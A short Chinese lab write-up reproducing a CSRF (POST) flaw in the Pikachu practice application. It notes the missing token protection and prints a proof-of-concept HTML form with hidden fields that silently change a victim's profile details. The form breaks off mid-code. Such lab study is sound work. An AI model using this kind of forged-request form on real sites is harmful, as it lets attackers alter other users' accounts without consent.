CSRF(post)漏洞复现

一、分析代码

发现验证refer,没有token验证,没有防止csrf的措施,可以进行CSRF攻击。

二、构建一个错误信息脚本

csrf_poc.php 

放入http://192.168.56.129/pikachu-master/vul/csrf 中
<html>
    <body> 
        <form  name="px"  method="post"  action="http://192.168.56.129/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
            <input type="hidden" name="sex"  value="girl">
            <input type="hidden" name="phonenum" value="12345678922">
            <input type="hidden" name="add" value="nab77">
            <input type="hidden" name="email" value="lucy@pikachu.com">
             <input type="submit" name="submit" value="submit"> 
      
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值